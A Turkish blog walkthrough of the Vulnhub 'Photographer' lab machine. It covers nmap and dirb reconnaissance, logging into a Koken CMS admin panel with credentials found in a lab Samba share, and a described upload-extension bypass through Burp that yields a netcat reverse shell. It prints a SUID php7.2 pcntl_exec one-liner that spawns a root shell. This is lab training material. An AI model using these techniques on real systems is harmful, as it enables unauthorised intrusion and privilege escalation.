Sızma Testi Örnekleri:Photographer

Yine yeni bir vulnhub makinesiyle karşınızdayım. Makinenin açıklama kısmında bu makinenin oscp ye hazırlanmak için geliştirildiği yazıyor. Çözümünü oldukça güzel ve öğretici buldum. Her zamanki gibi işe makinenin ip adresini bulmakla başlayalım.

netdiscover

Nmap çıktısısına baktığımızda web servislerinin ve samba servisinin ayakta olduğunu görüyoruz.

nmap -A -p- -o nmap 192.168.1.26
# Nmap 7.80 scan initiated Fri Oct  2 04:09:18 2020 as: nmap -A -p- -o nmap 192.168.1.26
Nmap scan report for 192.168.1.26
Host is up (0.00017s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
MAC Address: 08:00:27:10:27:06 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: -1h39m56s, deviation: 2h18m33s, median: -2h59m56s
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2020-10-01T18:09:37-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-01T22:09:37
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.1.26

Samba servisine baktığımda wordpress backup dosyası ve mailsent.txt dosyası buluyorum.Gönderilen mail içinde alıcı ve mesaj dikkatimi çekiyor.

Şimdilik bu burada kalsın.Web servisine baktığımda pek birşey bulamıyorum fakat 8000.portuna dizin taraması yaptığımda admin dizini olduğunu görüyorum.

dirb http://192.168.1.26 -w

admin dizinine girdiğimde karşımda admin paneli beliriyor.Burada mailsent.txt dosyasındaki bilgileri kullanıyorum.

mail : daisa@photographer.com

password : babygirl

Bu aşamada siteye shell atıp oturum almam gerek.Koken CMS in ne gibi zafiyeti var diye araştırdığımda karşıma şöyle bir bilgi çıktı ve rahatlıkla shell atabileceğimi gördüm.

İlk olarak shell dosyamı oluşturdum ve uzantısını .php.jpg olarak değiştirdim.

Daha sonra siteye shell’imi yüklerken Burp ile araya girip tekrardan .php uzantısına çevirip dosyamı yükledim.

Yüklediğim shell’i anasayfadan çağırdığımda arkada çalışan netcat e ters bağlantı aldım.

Daha sonra daisa kullanıcısının home dizinine gelip user.txt dosyasını okuyabildim.

Yetki yükseltebilmek için makineye biraz bakayım derken suid bit ayarlı bir program gözüme çarptı.Php7.2 suid bit ayarlıydı.

find / -perm -u=s -type f 2>/dev/null

Bununla nasıl yetki yükseltebilirim derken şu arkadaştan yardım aldım.Bu site birçok yetki yükseltme yöntemini anlatıyor.Şİddetle tavsiye ederim.

/usr/bin/php7.2 -r “pcntl_exec(‘/bin/sh’, [‘-p’]);”

En son /root dizini altında bulunan proof.txt dosyasını okuyup makinenin çözümünü bitirmiş oluyorum.

Diğer yazıda görüşmek üzere.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir